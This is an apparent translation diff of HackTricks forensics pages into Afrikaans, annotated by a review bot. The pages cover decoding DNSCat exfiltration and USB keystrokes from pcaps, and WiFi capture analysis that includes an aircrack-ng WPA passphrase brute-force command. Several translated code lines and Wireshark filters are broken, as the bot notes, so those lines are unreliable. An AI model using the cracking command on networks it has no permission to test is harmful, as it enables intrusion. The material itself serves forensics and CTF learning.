* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
|
|
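Review bot: The recurring boilerplate is translated differently each time it appears in this commit, which will make later search-and-replace maintenance harder. "Share your hacking tricks ... github repos" becomes `Deel jou hacktruuks ... github-opslag` in the header of this file, `Deel jou haktruuks ... github-repos` here, and `Deel jou hacking-truuks ... GitHub-opslagplekke` in the next file; likewise the RootedCON banner reads `kuberveiligheidsevenement ... kuberveiligheidspesialiste` at the top and bottom of this file but `sibersekuriteitsgebeurtenis ... sibersekuriteitsprofessionals` in the middle. Pick one rendering of each banner and reuse it verbatim everywhere so the header and footer stay identical across pages.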
@ -1,65 +1,57 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
|
||||
|
||||
You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
|
||||
As jy 'n pcap het met data wat **deur DNSCat uitgelekte word** (sonder om versleuteling te gebruik), kan jy die uitgelekte inhoud vind.
|
||||
|
||||
Jy hoef net te weet dat die **eerste 9 byte** nie werklike data is nie, maar verband hou met die **C\&C-kommunikasie**:
|
||||
```python
|
||||
from scapy.all import rdpcap, DNSQR, DNSRR
|
||||
import struct
|
||||
import struct
|
||||
|
||||
f = ""
|
||||
last = ""
|
||||
for p in rdpcap('ch21.pcap'):
|
||||
if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
|
||||
if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
|
||||
|
||||
qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
|
||||
qry = ''.join(_.decode('hex') for _ in qry)[9:]
|
||||
if last != qry:
|
||||
print(qry)
|
||||
f += qry
|
||||
last = qry
|
||||
qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
|
||||
qry = ''.join(_.decode('hex') for _ in qry)[9:]
|
||||
if last != qry:
|
||||
print(qry)
|
||||
f += qry
|
||||
last = qry
|
||||
|
||||
#print(f)
|
||||
```
|
||||
|
||||
For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
|
||||
Vir meer inligting: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
|
||||
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
|
||||
|
||||
|
||||
There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||
|
||||
Daar is 'n skripsie wat met Python3 werk: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||
```
|
||||
python3 dnscat_decoder.py sample.pcap bad_domain
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
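Review bot: The Python block in this hunk has had its indentation changed: `import struct`, `if p.haslayer(DNSQR) and not p.haslayer(DNSRR):` and every line of the loop body (`qry = p[DNSQR].qname.replace(...)`, `qry = ''.join(...)[9:]`, `if last != qry:`, `print(qry)`, `f += qry`, `last = qry`) appear as both a removed and an added line with identical visible text, which in a diff means only whitespace differs. Since Python delimits the `for` and `if` bodies by indentation, the translated copy will no longer parse; fenced code should pass through the translation step byte-for-byte. In the prose, `'n skripsie` means a thesis; the word wanted for "script" is `skrip`, and `uitgelekte word` should read `uitgelek word`.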
@ -1,27 +1,25 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection.
|
||||
As jy 'n pcap het van 'n USB-verbinding met baie onderbrekings, is dit waarskynlik 'n USB-toetsbordverbinding.
|
||||
|
||||
A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
|
||||
'n Wireshark-filter soos hierdie kan nuttig wees: `usb.transfer_type == 0x01 en frame.len == 35 en !(usb.capdata == 00:00:00:00:00:00:00:00)`
|
||||
|
||||
It could be important to know that the data that starts with "02" is pressed using shift.
|
||||
Dit kan belangrik wees om te weet dat die data wat met "02" begin, gedruk word deur die Shift-knoppie.
|
||||
|
||||
You can read more information and find some scripts about how to analyse this in:
|
||||
Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in:
|
||||
|
||||
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
|
||||
* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
|
||||
|
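Review bot: The translated Wireshark filter `usb.transfer_type == 0x01 en frame.len == 35 en !(usb.capdata == 00:00:00:00:00:00:00:00)` has the operator `and` rendered as `en`, which Wireshark's display-filter syntax does not accept, so the filter fails as pasted. Keep the original `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` inside the backticks; inline code and filter expressions should be excluded from translation.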
@ -30,16 +28,14 @@ You can read more information and find some scripts about how to analyse this in
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,34 +1,28 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
If you have a pcap containing the communication via USB of a keyboard like the following one:
|
||||
As jy 'n pcap het wat die kommunikasie via USB van 'n sleutelbord bevat, soos die volgende een:
|
||||
|
||||
![](<../../../.gitbook/assets/image (613).png>)
|
||||
|
||||
You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication:
|
||||
|
||||
Jy kan die instrument [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) gebruik om te sien wat in die kommunikasie geskryf is:
|
||||
```bash
|
||||
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
|
||||
python3 usbkeyboard.py ./keystrokes.txt
|
||||
```
|
||||
|
||||
|
||||
|
||||
You can read more information and find some scripts about how to analyse this in:
|
||||
Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in:
|
||||
|
||||
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
|
||||
* [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
|
||||
|
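Review bot: terminology drifts between files in this commit: "keyboard" is rendered as `sleutelbord` here (`As jy 'n pcap het wat die kommunikasie via USB van 'n sleutelbord bevat`) but as `toetsbord` in the previous file, and the footer's "github repos" becomes `github-opslag` here but `GitHub-opslagplekke` in the earlier footer. Pick one term per concept and apply it consistently across the translated pages so readers can search for it.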
@ -36,16 +30,14 @@ You can read more information and find some scripts about how to analyse this in
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,23 +1,21 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Check BSSIDs
|
||||
# Kontroleer BSSIDs
|
||||
|
||||
When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
|
||||
Wanneer jy 'n vangste ontvang waarvan die hoofverkeer Wifi is en jy gebruik WireShark, kan jy begin ondersoek instel na al die SSIDs van die vangste met _Wireless --> WLAN Traffic_:
|
||||
|
||||
![](<../../../.gitbook/assets/image (424).png>)
|
||||
|
||||
|
@ -25,31 +23,29 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
|
|||
|
||||
## Brute Force
|
||||
|
||||
One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
|
||||
|
||||
Een van die kolomme van daardie skerm dui aan of **enige outentifikasie binne die pcap gevind is**. As dit die geval is, kan jy probeer om dit te Brute force deur `aircrack-ng` te gebruik:
|
||||
```bash
|
||||
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
|
||||
```
|
||||
Byvoorbeeld, dit sal die WPA-wagwoord herwin wat 'n PSK (vooraf gedeelde sleutel) beskerm, wat later nodig sal wees om die verkeer te ontsleutel.
|
||||
|
||||
For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later.
|
||||
# Data in Beacons / Sykanaal
|
||||
|
||||
# Data in Beacons / Side Channel
|
||||
As jy vermoed dat **data binne beacons van 'n WiFi-netwerk uitgelek word**, kan jy die beacons van die netwerk ondersoek deur 'n filter soos die volgende te gebruik: `wlan bevat <NAAMvanNETWERK>`, of `wlan.ssid == "NAAMvanNETWERK"` soek binne die gefiltreerde pakkies vir verdagte strings.
|
||||
|
||||
If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains <NAMEofNETWORK>`, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
|
||||
# Vind Onbekende MAC-adresse in 'n WiFi-netwerk
|
||||
|
||||
# Find Unknown MAC Addresses in A Wifi Network
|
||||
|
||||
The following link will be useful to find the **machines sending data inside a Wifi Network**:
|
||||
Die volgende skakel sal nuttig wees om die **toestelle wat data binne 'n WiFi-netwerk stuur** te vind:
|
||||
|
||||
* `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
|
||||
|
||||
If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
|
||||
As jy reeds **MAC-adresse ken, kan jy dit uit die uitset verwyder** deur kontroles soos hierdie een by te voeg: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
|
||||
|
||||
Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
|
||||
Nadat jy **onbekende MAC-adresse wat binne die netwerk kommunikeer, opgespoor het**, kan jy **filters** soos die volgende een gebruik: `wlan.addr==<MAC-adres> && (ftp || http || ssh || telnet)` om die verkeer te filtreer. Let daarop dat ftp/http/ssh/telnet-filters nuttig is as jy die verkeer ontsluit het.
|
||||
|
||||
# Decrypt Traffic
|
||||
# Ontsleutel Verkeer
|
||||
|
||||
Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
|
||||
Wysig --> Voorkeure --> Protokolle --> IEEE 802.11 --> Wysig
|
||||
|
||||
![](<../../../.gitbook/assets/image (426).png>)
|
||||
|
||||
|
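Review bot: the beacon filter in the `As jy vermoed dat **data binne beacons ...` line is broken by translation: `wlan contains <NAMEofNETWORK>` became `wlan bevat <NAAMvanNETWERK>`, and `contains` is a Wireshark display-filter operator, so `bevat` will not parse; restore `wlan contains <NAAMvanNETWERK>` (translating only the placeholder is fine). In the same hunk the menu path `Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit` was translated to `Wysig --> Voorkeure --> Protokolle --> IEEE 802.11 --> Wysig`, while the `Statistics --> Resolved Addresses` style paths later in this commit keep the English labels; Wireshark's UI shows the English labels, so keep menu paths untranslated for consistency. Minor: `ontsluit` for "decrypted" in the unknown-MAC paragraph should match `Ontsleutel` used in the heading that follows it.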
@ -59,16 +55,14 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
